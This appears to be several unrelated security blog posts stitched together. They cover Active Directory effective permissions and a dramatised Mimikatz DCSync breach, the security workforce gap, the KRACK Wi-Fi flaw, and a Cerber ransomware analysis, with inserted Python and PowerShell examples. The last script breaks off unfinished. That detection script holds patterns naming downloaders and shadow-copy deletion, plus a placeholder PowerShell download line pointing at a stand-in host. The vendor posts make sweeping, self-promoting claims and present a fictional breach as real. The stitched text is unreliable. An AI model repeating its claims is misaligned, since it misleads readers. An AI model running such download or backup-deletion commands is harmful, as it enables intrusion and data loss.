In fact, Active Directory privileged access accounts have been getting a lot of attention lately, because so many cyber security experts and companies are starting to realize that there exists a treasure trove of privileged access in Active Directory. Thus, recently many such cyber security experts and companies have started shedding light on them (for example, one, two, three etc.), and some have even started developing amateur tools to identify such accounts.
What these experts and companies may not know is that their amateur tools are substantially inaccurate since they rely on finding out "Who has what Permissions in Active Directory" WHEREAS the ONLY way to correctly identify privileged user accounts in Active Directory is by accurately finding out "Who has what Effective Permissions in Active Directory?"
On a lighter note, I find it rather amusing that for lack of knowing better, most cyber security experts and vendors that may be new to Active Directory Security have been referring to such accounts as Stealthy Admins, Shadow Admins etc.
To make matters worse, there are many prominent vendors in the Active Directory space that merely offer basic Active Directory Permissions Analysis/Audit Tooling, yet they mislead organizations by claiming to help them "Find out who has what privileged access in Active Directory," and since so many IT personnel don't seem to know better, they get misled.
Thus, there's an imperative need to help organizations learn how to correctly audit privileged users in Active Directory.
Consequently, the intention of my blogging is to HELP thousands of organizations and cyber security experts worldwide UNDERSTAND that the ONLY correct way to identify privileged users in Active Directory is by accurately determining effective permissions / effective access in Active Directory. There is only ONE correct way to accomplish this objective.
Why have you been a little hard on Microsoft lately?
Let me begin by saying that I deeply love and care for Microsoft. It may appear that I may have been a tad hard on them, but that is all well-intentioned and only meant to help them realize that they have an obligation to their global customer base to adequately educate them about various aspects of cyber security in Windows, particularly the most vital aspects.
In that regard, if you truly understand cyber security in Windows environments, you know that Active Directory Effective Permissions and Active Directory Effective Access play an absolutely paramount role in securing Windows deployments worldwide, and since Active Directory has been around for almost two decades by now, one would expect the world to unequivocally understand this by now. Unfortunately, we found that (as evidenced above) no one seems to have a clue.
You may be surprised if I were to share with you that at most organizations worldwide, hardly anyone seems to even know about what Active Directory Effective Permissions are, let alone why they're paramount to their security, and this a highly concerning fact, because this means that most organizations worldwide are operating in the proverbial dark today.
It is upon looking into the reason for this that we realized that in the last decade, it appears that (for whatever reason) Microsoft may not have educated its global customer base about Active Directory Effective Permissions at all - Proof.
Thus, it is in the best interest of organizations worldwide that we felt a need to substantially raise awareness.
As to how on earth Microsoft may have completely forgotten to educate the world about this, I can only guess that perhaps they must've gotten so involved in building their Cloud offering and dealing with the menace of local-machine credential-theft attack vectors that they completely seem to have missed this one paramount aspect of Windows security.
Fortunately for them and the world, we've had our eye on this problem for a decade now and we've been laser-focused. Besides, actions speak louder than words, so once you understand what it is we do at Paramount Defenses, you'll see that we've done more to help secure Microsoft's global customer base than possibly any other company on the planet.
Those who understand what we've built, know that we may be Microsoft's most strategic ally in the cyber security space.
Finally, the most important reason as to why I do, what I do is because I care deeply and passionately about cyber security.
There's so much more to share, and I will continue to do so.
A Paramount Global Cyber Security Need
Today, I wanted to take a moment to touch upon one (not so) little aspect of cyber security that today profoundly impacts the foundational security of 85% of all business and government organizations worldwide, including most cyber security companies.
Folks, I am talking about empowering organizations worldwide to identify exactly who holds the proverbial "Keys to the Kingdom", i.e. helping them accurately identify exactly who actually possesses what privileged access in their Active Directory deployments.
The reason this is so important is because 100% of all major recent cyber security breaches (e.g. Snowden, Target, JP Morgan, Sony, Anthem, OPM) involved the compromise and misuse of guess what - just ONE Active Directory Privileged User Account.
Since we've been silently working on this since 2006, we have a head start of about a decade. Over the last few months, we've seen several prominent vendors finally realize the importance of doing so, and we've seen them share guidance on this subject.
Unfortunately, just about every piece of advice out there, whether it be from prominent cyber security experts or billion dollar cyber security companies, on how to actually correctly audit privileged access in Active Directory, is dangerously inaccurate.
There's an old saying - "Actions Speak Louder Than Words." While there's no dearth of talk by so many big names out there on how to improve cyber security, identify privileged users etc., the key to actually (demonstrably and provably) enhancing cyber security lies in actually helping organizations do so, and we've been silently at work for a decade to help organizations do so.
So, in days to come, right here on this blog, I'm going to (hopefully for one last time), share exactly how organizations worldwide can today accurately and efficiently identify privileged access in their foundational Active Directory deployments worldwide.
In doing so, we will yet again demonstrate thought leadership in the cyber security space. By the way, this is neither about us, nor about pride. I've already said I'm just a nobody (whose work possibly impacts everybody). This is about a desire to help.
So, that post should be out right here on this blog next week, possibly as early as Monday morning.
The basic infrastructure that supports our daily lives is deeply dependent on the Internet, and, therefore, continually exposed to the risk of new threats and cyber attacks. As security breaches grow in frequency and sophistication every day, it’s crucial to build resiliency and then take steps to protect critical infrastructure to remain safe and secure online.
It’s important to identify current and future strategies to protect your infrastructure and manage your risk. Cyber security is one of the biggest challenges organizations face today. Regardless of size or industry, every organization must ask themselves, is my security strategy up to date? If your organization is looking to stay on the front line of cyber security, it’s imperative to know how an end-to-end risk management strategy can help you properly secure your infrastructure.
Our security experts have an abundance of experience, and several areas of expertise we can put to work for you. We are committed to keeping your organization safe and secure, and can help design, deploy, and support solutions to address your critical risks and defend your critical infrastructure. For more information, contact one of our security experts today!
With the continuous state of change in the global threat landscape, organizations face cyber attacks and security breaches that are growing in frequency and sophistication every day. But now, consider this: according to a study by the Center for Cyber Safety and Education, there will be a shortage of 1.8 million information security workers by 2022. This gap should be of great concern to organizations.
Skilled people make the difference in protecting sensitive data, so it’s more critical than ever that organizations begin to attract and retain the cybersecurity talent needed to defend against the evolving threat landscape. At Connection, we help inspire individuals coming out of universities to engage in co-op or intern-related opportunities, and I strongly encourage other organizations to see what they can do to help young people today who are really interested in building their skills in this area.
The figures don’t lie. The demand for cyber security will only continue to grow. Through local collaborative efforts between employers, training providers, and community leaders, we can ensure individuals have the opportunity to build on their tech knowledge and participate in a secure, thriving economy.
It’s impossible to overstate the importance of security in today’s digital world. Cyber attacks are growing in frequency and sophistication every day, and a key risk to our economy and security is the lack of professionals to protect our growing networks. According to a study by the Center for Cyber Safety and Education, by 2022, there will be a shortage of 1.8 million information security workers. So, it’s critical that we begin now to prepare our students—and any others who are interested in making a career move—to fill these gaps. Many colleges and universities have developed information assurance programs that help technical, security-minded students achieve a great foundation in this industry. We also challenge corporations to offer intern and co-op opportunities for students in these degree programs, so they can see what security looks like in practical, business-world applications.
Connection is committed to promoting cyber security and online safety. Cyber security is a viable and rewarding profession and we encourage people from all backgrounds to see information security as an essential career path.
The world has been rocked once again with a serious flaw in a basic security mechanism that we all take for granted to keep us safe and secure. According to Dark Reading, researchers at KU Leuven in Belgium have uncovered as many as 10 vulnerabilities in the Wi-Fi Protected Access II (WPA2) protocol used to secure Wi-Fi networks. This is a protocol that—as we have all learned over the last several years—must be configured correctly to keep us safe.
The key reinstallation attack—or KRACK—impacts all modern wireless networks using the WPA2 protocol. By replaying a handshake message, an attacker within radio range can trick a client into reinstalling a key it is already using, which resets the per-packet nonce; the resulting keystream reuse lets the attacker decrypt data packets (and, where TKIP or GCMP is in use, forge them), so that private (encrypted) communication is no longer private. Although the flaw requires the attacker to be in close proximity to the network, this is especially bad news for those with far-reaching wireless signals—such as hotel and hospital lobbies—where an attacker can just sit down and work their trade.
The CERT/CC Vulnerability Notes Database entry (VU#228519) provides a summary and detailed description of the vulnerabilities. It includes a list of vendors who may be affected by the vulnerability, and a status field indicating whether the vendor has any products that are affected.
What can you do?
Vendors are currently identifying their affected products and working on patches to address this attack. In the meantime, here are a few things you can do to keep your information safe:
Apply patches as they are released
Pay careful attention to your wireless environment
Watch for people and technology that look out of place
Utilize a trusted VPN solution
When possible, transfer data over an encrypted channel—such as HTTPS
Restrict sensitive information that would normally pass over a wireless network
And, as always, it’s a good practice to monitor access logs and wireless traffic to look for anomalies in standard business communication
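To make the "key reinstallation" concrete, here is an added example (not code from the original post or from the KRACK researchers) that models the mechanism in a few dozen lines of Python. The keystream function is a stand-in for CCMP's AES-CTR (HMAC-SHA256 keyed by the session key and packet number, which has the same property that matters here: it depends only on the key and the packet number), the session key and the two frames are constructed sample data, and the station classes are simplified models of a vulnerable and a patched supplicant, not real driver code. It shows that once a replayed message 3 resets the packet number, two frames share a keystream and one known plaintext recovers the other.

```python
"""Added example: why a key reinstallation breaks confidentiality.
The keystream generator is a stand-in for CCMP's AES-CTR; the session key,
frames and station behaviour are constructed for illustration."""
import hashlib
import hmac


def keystream(ptk: bytes, packet_number: int, length: int) -> bytes:
    """Keystream depends only on (key, packet number): reuse the pair and it repeats."""
    out = b""
    block = 0
    while len(out) < length:
        msg = packet_number.to_bytes(6, "big") + block.to_bytes(4, "big")
        out += hmac.new(ptk, msg, hashlib.sha256).digest()
        block += 1
    return out[:length]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class VulnerableStation:
    """Client that reinstalls the PTK (and resets the packet number) on every message 3."""

    def __init__(self):
        self.ptk = None
        self.pn = 0

    def handle_msg3(self, ptk: bytes):
        self.ptk = ptk
        self.pn = 0  # nonce reset: the behaviour KRACK exploits

    def encrypt(self, plaintext: bytes):
        self.pn += 1
        return self.pn, xor(plaintext, keystream(self.ptk, self.pn, len(plaintext)))


class PatchedStation(VulnerableStation):
    """Fix: a retransmitted message 3 carrying the already-installed key is not reinstalled."""

    def handle_msg3(self, ptk: bytes):
        if self.ptk == ptk:
            return  # keep key and packet number; the retransmit is just acknowledged
        super().handle_msg3(ptk)


PTK = b"\x11" * 16                               # constructed session key
P1 = b"GET /account/balance HTTP/1.1\r\n"        # constructed frames, equal length
P2 = b"Cookie: session=DEADBEEF0123456"


def run(station_cls):
    """Handshake, one frame, a replayed message 3 (what the attacker forces), second frame."""
    sta = station_cls()
    sta.handle_msg3(PTK)
    pn1, c1 = sta.encrypt(P1)
    sta.handle_msg3(PTK)  # retransmitted / replayed message 3
    pn2, c2 = sta.encrypt(P2)
    return pn1, pn2, c1, c2


def recover_second_frame(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """With a reused keystream, c1 ^ c2 = p1 ^ p2, so a known p1 yields p2."""
    return xor(xor(c1, c2), known_p1)


if __name__ == "__main__":
    pn1, pn2, c1, c2 = run(VulnerableStation)
    print("vulnerable: packet numbers", pn1, pn2, "->", recover_second_frame(c1, c2, P1))
    pn1, pn2, c1, c2 = run(PatchedStation)
    print("patched:    packet numbers", pn1, pn2, "->", recover_second_frame(c1, c2, P1))
```

The vulnerable station encrypts both frames under packet number 1, so the second frame falls out of the first; the patched station keeps counting and the same XOR yields noise. This is the reason "apply patches" heads the list above: the fix is on the client (and AP) side, and a VPN or HTTPS only limits what a reused keystream exposes.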
How has this Wi-Fi vulnerability affected your organization? Leave a comment below to share your experience and any additional advice you have for staying protected.
(A Must-Read for all CEOs, CFOs, CIOs, CISOs, Board Members & Shareholders Today)
Today was supposed to be an exciting Friday morning at a Multi-Billion $ organization since the world's top Cloud Computing companies were going to make their final pitches to the company's C-Suite today, as it was considering moving to the "Cloud."
With Cloud Computing companies spending billions to market their latest Kool-Aid to organizations worldwide (even though much of this may actually not be ready for mission-critical stuff), how could this company too NOT be considering the Cloud?
The C-Suite Meeting
Today was a HUGE day for this multi-billion dollar company, for today after several months of researching and evaluating their choices and options, the company's leadership would finally be deciding as to which Cloud Computing provider to go with.
This meeting is being chaired by the Chairman of the Board and attended by the following organizational employees -
Chief Executive Officer (CEO)
Chief Financial Officer (CFO)
Chief Information Officer (CIO)
Chief Information Security Officer (CISO)
Also in attendance are about a dozen Vice Presidents, representing Sales, Marketing, Research and Development etc.
After breakfast, the presentations began at 9:00 am. The organization's CIO kicked off the meeting, rattling off the numerous benefits that the company could enjoy by moving to the Cloud, and minutes later the Vice President of Cloud Computing from the first Cloud Computing company vying for their business started his presentation. His presentation lasted two hours.
The C-Suite then took a break for lunch.
The next presentation began at 1:00 pm and was expected to last till about 4:00 pm. The Vice President of Cloud Computing from the second Cloud Computing company had started her presentation and was almost an hour into it, when all of a sudden this happened...
... the CISO's assistant unexpectedly entered the room, went straight to the CISO and whispered something into his ear.
Everyone was surprised, and all eyes were on the CISO, who grimly asked his assistant - "Are you 100% sure?" He said "Yes."
Houston, We Have a Problem
The CISO walked up to the CIO and whispered something into his ear. The CIO sat there in complete shock for a moment!
He then gathered himself and proceeded to request everyone except the C-Suite to immediately leave the conference room.
He told the Vice President of this Cloud Computing company - "Hopefully, we'll get back to you in a few weeks."
He then looked at the CEO and the Chairman of the Board, and he said - "Sir, we have a problem!"
The CEO asked the CIO - "What's wrong? What happened?"
The CIO replied - "Sir, about 30 minutes ago, an intruder compromised the credentials of each one of our 20,000 employees!"
The CEO was almost in shock, and just couldn't believe what he had just heard, so he asked - "Everyone's credentials?!"
The CIO replied - "I'm afraid yes Sir, yours, mine, literally everyone's, including that of all our privileged users!"
The CEO could sense that there was more bad news, so he asked - "Is there something else I should know?"
The CIO replied - "Sir, 15 minutes ago, the intruder logged on as an Enterprise Admin, disabled the accounts of each one of our privileged users, and used Group Policy to deploy malicious software to each one of our 30,000 domain-joined computers! By now, he could have stolen, exfiltrated and destroyed the entirety of our digital assets! We may have lost literally everything!"
The CEO was shocked! They'd just been breached, and what a massive breach it was - "How could this have happened?"
The CIO turned to the CISO, who stepped in, and answered the question - "Sir, an intruder used a tool called Mimikatz DCSync to basically request and instantly obtain the credentials of every single user from our foundational Active Directory deployment."
The CEO asked - "What is Active Directory?"
The CISO replied - "Sir, simply put, it is the very foundation of our cyber security"
The CEO then asked - "Wait. Can just anyone request and extract credentials from Active Directory?"
The CISO replied - "Sir, not everyone can. Only those individuals who have sufficient access to do so, and by that I mean specifically only those who have Get-Replication-Changes-All effective permissions on the domain root object, can do so."
The CEO then said - "This does not sound right to me. I'm no technical genius, but shouldn't we have known exactly who all have this, whatever you just said, er yes that Get-Replication-Changes-All effective permissions in our Active Directory?!"
The CISO replied - "Sir, it turns out that accurate determination of effective permissions in Active Directory is actually very difficult, and as a result it is almost impossible to figure out exactly who has this effective permission on our domain root!"
The CEO figured it out - "So you're saying that the intruder had compromised the account of someone who was not on your radar and not supposed to have this access, but actually did, and the intruder used that access to steal everyone's credentials?"
The CISO replied - "That's right. It appears we did not know that this someone had sufficient access (i.e. effective permissions) to be able to replicate secrets from Active Directory, because it is very difficult to accurately figure this out in Active Directory."
The CEO was furious! - "You're kidding, right?! Microsoft's spent billions on this new fad called the "Cloud", yet it doesn't even have a solution to help figure out something as vital as this in Active Directory? How long has Active Directory been around?!"
The CISO replied - "Seventeen years."
The CEO then said in disbelief - "Did you just say 17 years, as in S-E-V-E-N-T-E-E-N years?! Get Satya Nadella on the line now! Perhaps I should #REFRESH his memory that we're a customer, and that we may have just lost a few B-I-L-L-I-O-N dollars!"
This is for Real
Make NO mistake about it. As amusing as it might sound, the scenario shared above is very REAL, and in fact today, most business and government organizations worldwide that operate on Active Directory have no idea as to exactly who has sufficient effective permissions to be able to replicate secrets out of their Active Directory. None whatsoever!
We can demonstrate the enactment of this exact scenario, and its underlying cause, to any organization that wishes to see it.
This Could've Been (and Can Be) Easily Prevented
This situation could easily have been prevented, if this organization's IT personnel had only possessed the ability to adequately and accurately determine effective permissions in their foundational Active Directory deployments.
Unfortunately, Mimikatz DCSync is just the tip of the iceberg. Today most organizations are likely operating in the dark and have no idea about their actual attack surface, and thus about exactly who can create, delete and manage the entirety of their domain user accounts, domain computer accounts, domain security groups, GPOs, service connection points (SCPs), OUs, etc., even though every insider and intruder could try to figure this out and misuse this insight to compromise their security.
Technically speaking, with even just minimal education and the right tooling, here is how easy it is for organizations to figure this out and lock this down today, i.e. to lock this down before an intruder can exploit it to inflict colossal damage - RIGHT HERE.
Oh, and you don't need to call Microsoft for this, although you certainly can and should. If you do, they'll likely have no answer, yet they might use even this to pitch you their latest toy, Microsoft ATA, and of course, their Cloud offering, Microsoft Azure.
Wait, weren't these C*Os discussing the Cloud (and likely Microsoft Azure) just a few hours (and a few billion dollars) ago?!
Unfortunately, given the massive scale of this breach, the company did not survive the attack, and had to declare bankruptcy. The C*Os of this company are still looking for suitable employment, and its shareholders ended up losing billions of dollars.
All of this could've been prevented, if they only knew about something as elemental as this, and had the ability to determine this.
The moral of the story is that while it's fine to fall for the latest fad, i.e. to consider moving to the "Cloud" and all, as and while you consider and plan to do so, you just cannot let your on-prem cyber defenses down even for a moment, because if you do so, you may not have a company left to move to the Cloud. A single excessive effective permission in Active Directory is all it takes.
I'll say this one more time and one last time - what I've shared above could easily happen at almost any organization today.
PS: If this sounds too simple and high-level, i.e. hardly technical, that is by intent, as it is written for a non-technical audience. This isn't to showcase our technical depth; examples of our technical depth can be found here, here, here, here, here, etc.
Here's why - Mimikatz DCSync, which embodies the technical brilliance of a certain Mr. Benjamin Delpy, may be the simplest example of how someone could attack Active Directory ACLs to instantly and completely compromise Active Directory. On the other hand, Gold Finger, which embodies the technical expertise of a certain former Microsoft employee, may be the simplest example of how one could defend Active Directory ACLs by being able to instantly identify/audit effective permissions/access in/across Active Directory, and thus lock down any and all unauthorized access in Active Directory ACLs, making it impossible for an(y) unauthorized user to use Mimikatz DCSync against Active Directory.
PS3: They say to the wise, a hint is enough. I just painted the whole picture out for you. (You may also want to read this & this.)
You'll want to read this short blog post very carefully because it not only impacts Microsoft, it likely impacts you, as well as the foundational security of 85% of all business and government organizations worldwide, and it does so in a positive way.
A Quick and Short Background
From the White House to the Fortune 1000, Microsoft Active Directory is the very foundation of cyber security at over 85% of organizations worldwide. In fact, it is also the foundation of cyber security of almost every cyber security company worldwide.
Active Directory is the Foundation of Cyber Security Worldwide
The entirety of an organization's building blocks of cyber security, including the user accounts used by the entirety of its workforce, as well as the user accounts of all its privileged users, the computer accounts of the entirety of its computers, and the security groups used to provision access to the entirety of its IT resources, are stored, managed and protected in Active Directory.
During the past few years, credential-theft attacks aimed at the compromise of an organization's privileged users (e.g. Domain Admins) have resulted in a substantial number of reported and unreported breaches at numerous organizations worldwide. In response, to help organizations combat the menace of these credential-theft attacks, Microsoft has had to make substantial enhancements to its Windows Operating Systems as well as acquire and introduce a technology called Microsoft ATA.
These enhancements have made it harder for perpetrators to find success with traditional credential-theft attacks, so they've started focusing their efforts on trying to find ways to attack the Active Directory itself, as evidenced by the fact that in the last year alone, we've seen the introduction of Mimikatz DCSync, BloodHound and recently the advent of Active Directory Botnets.
Make no mistake about it. There's no dearth of opportunity to find ways to exploit weaknesses in Active Directory deployments because there exists an ocean of access within Active Directory, and sadly due to an almost total lack of awareness, education, understanding and tooling, organizations have no idea as to exactly what lies within their Active Directory, particularly in regards to privileged access entitlements, and thus today there likely are 1000s of privilege escalation paths in most Active Directory deployments, waiting to be identified and exploited. All that perpetrators seem to lack today is the know-how and the tooling.
Unfortunately, since the cat's out of the bag, perpetrators seem to be learning fast, and building rapidly, so unless organizations act swiftly and decisively to adequately lock down the vast amount of access that currently exists in their foundational Active Directory deployments, sadly the next big wave of cyber breaches could involve compromise of Active Directory deployments.
Clearly, Microsoft Has No Answers
It gives me absolutely no pleasure to share with you that unfortunately, and sadly as always, Microsoft yet again seems to be playing catch-up, and in fact, it has no clue or any real answers, ideas or solutions to help organizations in this vital regard.
Here's Proof - Last week, on September 18, 2017, Microsoft's Advanced Threat Analytics (ATA) Team posted this -
If and when you read it, it will likely be unequivocally clear to you as to just how little Microsoft understands about not just the sheer depth and breadth of this monumental challenge, but about the sheer impact it could have on organizations worldwide!
You see, if you understand the subject of Active Directory Security well enough, then you know that Active Directory access control lists (ACLs) today don't just impact organizational security worldwide, they likely impact national and global security!
That said, in that post, the best Microsoft could do is concede that this could be a problem, wonder why organizations might ever need to change AdminSDHolder, falsely assume that it may not impact privileged users, praise a massively inaccurate tool for shedding light on this attack vector, and end by saying - "if you find a path with no obstacles, it probably leads somewhere."
Oh, and the very last thing they tell you is that their nascent ATA technology can detect multiple AD recon methods.
In contrast, here's what they should have said - "We care deeply about cyber security and we understand that left unaddressed, this could pose a serious cyber security risk to our customers. Rest assured that Microsoft Active Directory is a highly robust and securable technology, and here's exactly how organizations can adequately and reliably identify and lock down privileged access in their Active Directory deployments, leaving no room for perpetrators to identify and exploit any weaknesses."
The reason I say that should've been the response is because if you know enough about this problem, then you also know that it can actually be completely and sufficiently addressed, and that you don't need to rely on detection as a security measure.
BTW, to appreciate how little Microsoft seems to understand about this huge cyber security challenge, you'll want a yardstick to compare Microsoft's response with, so here it is (you'll want to read the posts) - Active Directory Security School for Microsoft.
Er, I'm really sorry but you are Microsoft, a US$ 550 Billion corporation, not a kid in college. If the best you can do concerning such a profoundly important cyber security challenge is show how little you seem to know about and understand this problem, and only have detection to offer as a solution, frankly, that's not just disappointing, that's deeply concerning, to say the least.
Further, if this is how little you seem to understand about such a profoundly important cyber security challenge concerning your own technology, I cannot help but wonder how well your customers might actually be protected in your recent Cloud offering.
Fortunately There's Help and Good News For Microsoft
I may appear to be critical of Microsoft, and I do still believe that they ought to at least have educated their customers about this and this huge cyber security challenge, but I also love Microsoft, because I've been (at) Microsoft, so I'm going to help them.
To my former colleagues at Microsoft I say - "Each one of us at Microsoft is passionate, cares deeply and always strives to do and be the best we can, and even though I may no longer be at Microsoft, (and I still can't believe how you missed this one), luckily and fortunately for you, we've got this covered, and we're going to help you out."
So, over the next few days, not only am I going to help reduce the almost total lack of awareness, education and understanding that exists at organizations today concerning Active Directory Security, I am also going to help organizations worldwide learn just how they can adequately and swiftly address this massive cyber security challenge before it becomes a huge problem.
What Constitutes a Privileged User in Active Directory
How to Correctly Audit Privileged Users/Access in Active Directory
How to Render Mimikatz DCSync Useless in an Active Directory Environment
How to Easily Identify and Thwart Sneaky Persistence in Active Directory
How to Easily Solve The Difficult Problem of Active Directory Botnets
The World's Top Active Directory Permissions Analysis Tools (and Why They're Mostly Useless)
The Paramount Need to Lockdown Access Privileges in Active Directory
How to Attain and Maintain Least Privileged Access (LPA) in Active Directory
How to Securely Delegate and Correctly Audit Administrative Access in Active Directory
How to Easily Secure Active Directory and Operate a Bulletproof Active Directory Deployment
You see, each one of these Active Directory security focused objectives can be easily accomplished, and in order to do so, what is required is the capability to accurately audit effective access in Active Directory. Sadly, let alone possessing this paramount cyber security capability, Microsoft doesn't even seem to have a clue about it.
Each one of these posts is absolutely essential for organizational cyber security worldwide, and if you know of even one other entity (e.g. individual, company etc.) on the planet that can help the world address each one of these today, do let me know.
Together, we can help adequately secure and defend organizations worldwide and deny perpetrators the opportunities and avenues they seek to compromise our foundational Active Directory deployments, because we must and because we can.
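As an added example (not code from either post above, nor from Gold Finger), here is how a defender can at least enumerate the explicit ACEs on the domain root that carry the replication rights DCSync depends on, and expand the groups those ACEs name into accounts. It assumes the RSAT ActiveDirectory module in a domain-joined session, and it deliberately stops short of true effective-permissions analysis: deny precedence, object ownership, members from trusted domains and unresolved foreign security principals are not handled, which is precisely the gap both posts describe.

```powershell
Import-Module ActiveDirectory   # RSAT module; creates the AD: drive used below

# rightsGuid values of the three replication extended rights, as published in the
# schema's Extended-Rights container. "DS-Replication-Get-Changes-All" is the formal
# name of the right the story calls "Get-Replication-Changes-All".
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-DomainRootReplicationAces {
    # Every ACE on the domain root that allows or denies a replication right.
    $domainDn = (Get-ADDomain).DistinguishedName
    $acl = Get-Acl -Path "AD:\$domainDn"
    foreach ($ace in $acl.Access) {
        $extendedRight = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
        # GenericAll carries the ExtendedRight bit too, so test the flag rather than the name
        if (-not $ace.ActiveDirectoryRights.HasFlag($extendedRight)) { continue }
        $allExtended = ($ace.ObjectType -eq [guid]::Empty)   # empty GUID = every extended right
        $guid = $ace.ObjectType.ToString().ToLower()
        if (-not $allExtended -and -not $ReplicationRights.ContainsKey($guid)) { continue }
        $right = if ($allExtended) { 'ALL extended rights' } else { $ReplicationRights[$guid] }
        [pscustomobject]@{
            Identity  = $ace.IdentityReference.Value
            AceType   = $ace.AccessControlType   # Allow or Deny
            Right     = $right
            Inherited = $ace.IsInherited
        }
    }
}

function Expand-Principal {
    # Resolve a group named in an ACE to its recursive membership; anything that is not
    # a domain group (well-known SIDs, unresolved SIDs, foreign principals) is returned as-is.
    param([string]$Identity)
    $sam = $Identity.Split('\')[-1]
    $obj = Get-ADObject -LDAPFilter "(sAMAccountName=$sam)" -ErrorAction SilentlyContinue
    if ($obj -and $obj.ObjectClass -eq 'group') {
        Get-ADGroupMember -Identity $obj.DistinguishedName -Recursive | ForEach-Object { $_.SamAccountName }
    } else {
        $Identity
    }
}

$aces = Get-DomainRootReplicationAces
"Explicit replication ACEs on the domain root (Deny entries included):"
$aces | Format-Table -AutoSize

"Accounts reachable through the Allow ACEs, group membership expanded:"
$aces | Where-Object { $_.AceType -eq 'Allow' } | ForEach-Object {
    $ace = $_
    foreach ($member in Expand-Principal -Identity $ace.Identity) {
        [pscustomobject]@{ Account = $member; Via = $ace.Identity; Right = $ace.Right }
    }
} | Sort-Object Account, Right -Unique | Format-Table -AutoSize
```

Anything in the second table that is not a domain controller computer account or a deliberately authorised administrator is a candidate for removal; a Deny entry in the first table is a reminder that this listing alone does not tell you who can actually replicate.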
Ransomware is a common method of cyber extortion for financial gain
that typically involves users being unable to interact with their
files, applications or systems until a ransom is paid. Accessibility
of cryptocurrency such as Bitcoin has directly contributed to this
ransomware model. Based on data from FireEye Dynamic Threat
Intelligence (DTI), ransomware activities have been rising
fairly steadily since mid-2015.
On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign
involving the distribution of emails with a malicious Microsoft Word
document attached. If a recipient were to open the document, a
malicious macro would contact an attacker-controlled website to
download and install the Cerber family of ransomware.
Exploit Guard, a major new feature of FireEye
Endpoint Security (HX), detected the threat and alerted HX
customers on infections in the field so that organizations could
inhibit the deployment of Cerber ransomware. After investigating
further, the FireEye research team worked with security agency
CERT-Netherlands, as well as web hosting providers who unknowingly
hosted the Cerber installer, and were able to shut down that instance
of the Cerber command and control (C2) within hours of detecting the
activity. With the attacker-controlled servers offline, macros and
other malicious payloads configured to download are incapable of
infecting users with ransomware.
FireEye hasn’t seen any additional infections from this attacker
since shutting down the C2 server, although the attacker could
configure one or more additional C2 servers and resume the campaign at
any time. This particular campaign was observed on six unique
endpoints from three different FireEye endpoint security customers. HX
has proven effective at detecting and inhibiting the success of Cerber malware.
The Cerber ransomware attack cycle we observed can be broadly broken
down into eight steps:
1. Target receives and opens a Word document.
2. A macro in the document is invoked to run PowerShell in hidden mode.
3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
4. On successful connection, the ransomware is written to the disk of the victim.
5. PowerShell executes the ransomware.
6. The ransomware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, startup, run and runonce registry keys.
7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
8. Files are encrypted and messages are presented to the user.
Rather than waiting for the payload to be downloaded or started
around stage four or five of the aforementioned attack cycle, Exploit
Guard provides coverage for most steps of the attack cycle – beginning
in this case at the second step.
The most common way to deliver ransomware is via Word documents with
embedded macros or a Microsoft Office exploit. FireEye Exploit Guard
detects both of these attacks at the initial stage of the attack cycle.
When the victim opens the attached Word document, the malicious
macro writes a small piece of VBScript into memory and executes it.
This VBScript executes PowerShell to connect to an attacker-controlled
server and download the ransomware (profilest.exe), as seen in Figure 1.
Figure 1. Launch sequence of Cerber – the macro
is responsible for invoking PowerShell and PowerShell downloads and
runs the malware
It has been increasingly common for threat actors to use malicious
macros to infect users because the majority of organizations permit
macros to run from Internet-sourced office documents.
In this case we observed the macro code calling PowerShell to bypass
execution policies – and run in hidden as well as encoded mode –
with the intention that PowerShell would download the ransomware and
execute it without the knowledge of the victim.
Further investigation of the link and executable showed that every
few seconds the malware hash changed with a more current compilation
timestamp and different appended data bytes – a technique often used
to evade hash-based detection.
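An added example (not FireEye's code) that turns the launch sequence and the backup-deletion step described above into a check over process-creation records. The field names (ParentImage, Image, CommandLine) follow Sysmon Event ID 1, and the records at the bottom are constructed for the demonstration; the decoder step shows why an "encoded" command line does not hide the download logic from a defender.

```powershell
function Test-CerberChain {
    # One process-creation record in, one finding out (nothing when it looks benign).
    param([Parameter(Mandatory, ValueFromPipeline)] [hashtable]$Record)
    process {
        $parent  = [IO.Path]::GetFileName("$($Record.ParentImage)").ToLower()
        $image   = [IO.Path]::GetFileName("$($Record.Image)").ToLower()
        $cmd     = "$($Record.CommandLine)"
        $reasons = @()

        # Steps 2-4: an Office process launching PowerShell with the switches the macro used
        if (($parent -in @('winword.exe', 'excel.exe', 'powerpnt.exe')) -and ($image -eq 'powershell.exe')) {
            $reasons += 'Office spawned PowerShell'
            if ($cmd -match '-(ep|exec|executionpolicy)\s+bypass') { $reasons += 'execution policy bypass' }
            if ($cmd -match '-w(indowstyle)?\s+hidden')            { $reasons += 'hidden window' }
            if ($cmd -match '-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})') {
                $reasons += 'encoded command'
                # -EncodedCommand is base64 of UTF-16LE; append the decoded text so it can be inspected too
                try { $cmd += ' ' + [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2])) } catch {}
            }
            if ($cmd -match 'net\.webclient|downloadfile|downloadstring|invoke-webrequest') { $reasons += 'downloader' }
        }
        # Step 7: backups and shadow copies deleted with native utilities
        if ($image -eq 'vssadmin.exe' -and $cmd -match 'delete\s+shadows')   { $reasons += 'vssadmin deleted shadow copies' }
        if ($image -eq 'wmic.exe'     -and $cmd -match 'shadowcopy\s+delete') { $reasons += 'wmic deleted shadow copies' }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{ Parent = $parent; Image = $image; Reasons = ($reasons -join '; ') }
        }
    }
}

# Constructed records for the demonstration (not real telemetry). The encoded command is
# built here from a harmless placeholder pointing at a reserved .invalid host name.
$placeholder = "(New-Object Net.WebClient).DownloadFile('http://example.invalid/profilest.exe', 'placeholder')"
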